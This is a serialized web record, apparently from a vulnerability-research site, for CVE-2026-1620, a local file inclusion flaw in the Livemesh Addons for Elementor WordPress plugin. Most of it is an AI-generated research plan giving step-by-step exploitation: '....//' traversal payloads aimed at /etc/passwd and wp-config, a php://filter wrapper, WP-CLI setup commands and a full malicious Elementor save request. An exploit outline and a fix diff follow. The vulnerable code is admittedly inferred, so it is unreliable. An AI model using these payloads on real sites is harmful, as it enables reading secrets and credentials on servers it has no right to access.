[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsyPovtsa_yCO4L2ryTEJRL4zRqMCccpQ8_yxhWRebbo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-1620","livemesh-addons-by-elementor-authenticated-contributor-local-file-inclusion-via-widget-template-parameter","Livemesh Addons by Elementor \u003C= 9.0 - Authenticated (Contributor+) Local File Inclusion via Widget Template Parameter","The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.0. This is due to insufficient sanitization of the template name parameter in the `lae_get_template_part()` function, which uses an inadequate `str_replace()` approach that can be bypassed using recursive directory traversal patterns. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the attacker to include and execute local files via the widget's template parameter granted they can trick an administrator into performing an action or install Elementor.","addons-for-elementor",null,"\u003C=9.0","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-04-15 17:56:59","2026-04-16 06:44:51",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2483875a-84de-4a40-a69e-aee68da1ce3b?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-1620**, a Local File Inclusion (LFI) vulnerability in the **Livemesh Addons by Elementor** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the `lae_get_template_part()` function. This function is designed to load template files for various widgets. It attempts to prevent directory traversal by using `str_replace()` to remove `..\u002F` sequences. However, this implementation is non-recursive. An attacker can use a payload like `....\u002F\u002F`, which, after a single pass of `str_replace('..\u002F', '', $payload)`, results in `..\u002F`, effectively bypassing the security check. Because the resulting path is used in a PHP `include` or `require` statement, a Contributor-level user can include arbitrary files from the server.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The vulnerability is triggered when a widget that uses `lae_get_template_part()` is rendered. This typically happens via the standard WordPress frontend or Elementor's preview\u002Fediting mode.\n*   **Vulnerable Parameter:** The `template` or `style` parameter within a Livemesh widget's configuration (stored in Elementor's `_elementor_data` post meta).\n*   **Authentication:** Contributor-level access is required to create\u002Fedit posts and insert Elementor widgets.\n*   **Preconditions:** \n    1.  The plugin **Livemesh Addons by Elementor** (slug: `addons-for-elementor`) version $\\le$ 9.0 must be installed.\n    2.  **Elementor** must be installed and active.\n    3.  The attacker must have a user account with at least `Contributor` privileges.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A user with Contributor permissions creates or edits an Elementor-enabled post.\n2.  **Widget Configuration:** The user adds a Livemesh widget (e.g., \"Services\" or \"Posts Grid\").\n3.  **Data Storage:** Elementor saves the widget settings as a JSON object in the `_elementor_data` meta field of the post.\n4.  **Rendering Sink:** When the post is viewed or previewed, the widget's `render()` method is called.\n5.  **Vulnerable Call:** The `render()` method calls `lae_get_template_part($slug, $name)`.\n6.  **The Flaw:** Inside `lae_get_template_part()`:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description\n    $name = str_replace('..\u002F', '', $name); \n    $template_file = LAE_PLUGIN_DIR . \"templates\u002F{$slug}-{$name}.php\";\n    include( $template_file );\n    ```\n7.  **Bypass:** By providing `$name` as `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fetc\u002Fpasswd`, the `str_replace` turns it into `..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`.\n\n### 4. Nonce Acquisition Strategy\nElementor saves and previews use specific nonces. However, as a Contributor, you can simply use the WordPress dashboard to create a post.\n\n1.  **Identify Script:** The plugin likely localizes data in `lae-settings-data` or similar.\n2.  **Create Content:** \n    ```bash\n    wp post create --post_type=post --post_status=publish --post_author=CONTRIBUTOR_ID --post_title=\"LFI Test\"\n    ```\n3.  **Browser Access:** Log in as the Contributor and navigate to the post editor.\n4.  **Extract Nonce:** If the save operation requires an Elementor-specific nonce, use:\n    ```javascript\n    \u002F\u002F In browser_eval\n    window.elementorCommon?.api?.utils?.getNonce() || window.elementorConfig?.nonces?.save_builder\n    ```\n\n*Note: For a simple LFI trigger, once the post meta is updated via WP-CLI or the editor, simply viewing the post (no nonce required) will trigger the inclusion.*\n\n### 5. Exploitation Strategy\nWe will use a Contributor account to inject the LFI payload into a widget's settings.\n\n**Step 1: Create a Post and identify the Widget**\nWe will target the \"Services\" widget (slug: `lae-services`).\n\n**Step 2: Update Post Meta with Payload**\nWe will inject a traversal string into the `template` or `style` parameter of the widget JSON.\nPayload: `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fetc\u002Fpasswd` (Assuming the plugin appends `.php`, we might need to target a known file or use a path that resolves despite the extension).\n\n**Step 3: Trigger the Inclusion**\nPerform an `http_request` to the post URL.\n\n### 6. Test Data Setup\n1.  **Users:** Create a contributor user.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Plugin Config:** Ensure Elementor is set up to allow Contributors to edit posts (default behavior).\n3.  **Target Post:** Create a post that will host the widget.\n    ```bash\n    wp post create --post_type=post --post_title=\"LFI Trigger\" --post_status=publish --post_author=attacker\n    ```\n\n### 7. Expected Results\nIf successful, the response body of the HTTP request to the post will contain the contents of the target file (e.g., `\u002Fetc\u002Fpasswd`).\n\n### 8. Verification Steps\n1.  **Check Meta:** Verify the payload was successfully injected into the database.\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n2.  **Verify Output:** Check if the `\u002Fetc\u002Fpasswd` content (like `root:x:0:0:root`) is present in the HTML response.\n\n### 9. Alternative Approaches\nIf `\u002Fetc\u002Fpasswd` fails due to the `.php` extension being appended by the plugin:\n*   **Attempt Path Traversal to Log Files:** Try including `\u002Fvar\u002Flog\u002Fapache2\u002Faccess.log` or `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php` (if the plugin appends `.php`, including `wp-config` without the extension might work).\n*   **Payload Modification:** Try `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fwp-config` (resulting in `..\u002F..\u002F..\u002F..\u002Fwp-config.php`).\n*   **Wrapper Technique:** If the input allows, try PHP filters: `php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=....\u002F\u002F....\u002F\u002F....\u002F\u002Fwp-config`.\n\n### HTTP Request Payload (Example)\nTo update the post with the malicious widget data using the REST API (if available) or by simulating the Elementor save:\n\n```http\nPOST \u002Fwp-json\u002Felementor\u002Fv1\u002Fdata\u002F [POST_ID] HTTP\u002F1.1\nContent-Type: application\u002Fjson\nX-WP-Nonce: [ELEMENTOR_NONCE]\n\n{\n  \"status\": \"publish\",\n  \"data\": [\n    {\n      \"id\": \"random_id\",\n      \"elType\": \"widget\",\n      \"widgetType\": \"lae-services\",\n      \"settings\": {\n        \"style\": \"....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fetc\u002Fpasswd\"\n      }\n    }\n  ]\n}\n```\n\n*Final Action: Navigate to `\u002F?p=[POST_ID]` and observe the inclusion.*","The Livemesh Addons for Elementor plugin is vulnerable to Local File Inclusion due to an insecure non-recursive directory traversal filter in the `lae_get_template_part()` function. Authenticated attackers with Contributor-level access can bypass the `str_replace('..\u002F', '', $name)` check by using the `....\u002F\u002F` pattern, allowing them to include arbitrary local files via widget template parameters.","\u002F\u002F Inferred from plugin architecture and vulnerability description\nfunction lae_get_template_part( $slug, $name = null ) {\n    if ( isset( $name ) ) {\n        \u002F\u002F Vulnerable non-recursive replacement\n        $name = str_replace( '..\u002F', '', $name );\n    }\n\n    $template = '';\n\n    if ( $name ) {\n        $template = LAE_PLUGIN_DIR . \"templates\u002F{$slug}-{$name}.php\";\n    } else {\n        $template = LAE_PLUGIN_DIR . \"templates\u002F{$slug}.php\";\n    }\n\n    if ( file_exists( $template ) ) {\n        include( $template );\n    }\n}","--- a\u002Fincludes\u002Fhelper-functions.php\n+++ b\u002Fincludes\u002Fhelper-functions.php\n@@ -5,7 +5,7 @@\n function lae_get_template_part( $slug, $name = null ) {\n \tif ( isset( $name ) ) {\n-\t\t$name = str_replace( '..\u002F', '', $name );\n+\t\t$name = sanitize_text_field( wp_basename( $name ) );\n \t}\n \n \t$template = '';","1. Authenticate as a WordPress user with Contributor-level privileges or higher.\n2. Create a new post or edit an existing one using the Elementor editor.\n3. Add a Livemesh Addons widget to the page (e.g., the 'Services' widget).\n4. Capture the request to save the Elementor data (usually a POST request to `\u002Fwp-json\u002Felementor\u002Fv1\u002Fdata\u002F[POST_ID]`).\n5. Modify the JSON payload in the `_elementor_data` field. Locate the widget's settings and change the 'style' or 'template' parameter to a traversal string using recursive patterns (e.g., `....\u002F\u002F....\u002F\u002F....\u002F\u002F....\u002F\u002Fwp-config`).\n6. Save the changes and navigate to the published post's URL.\n7. The plugin will process the `....\u002F\u002F` sequence into `..\u002F`, resolve the path to `wp-config.php`, and include it during the page rendering process.","gemini-3-flash-preview","2026-04-16 15:23:10","2026-04-16 15:23:31",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor\u002Ftags"]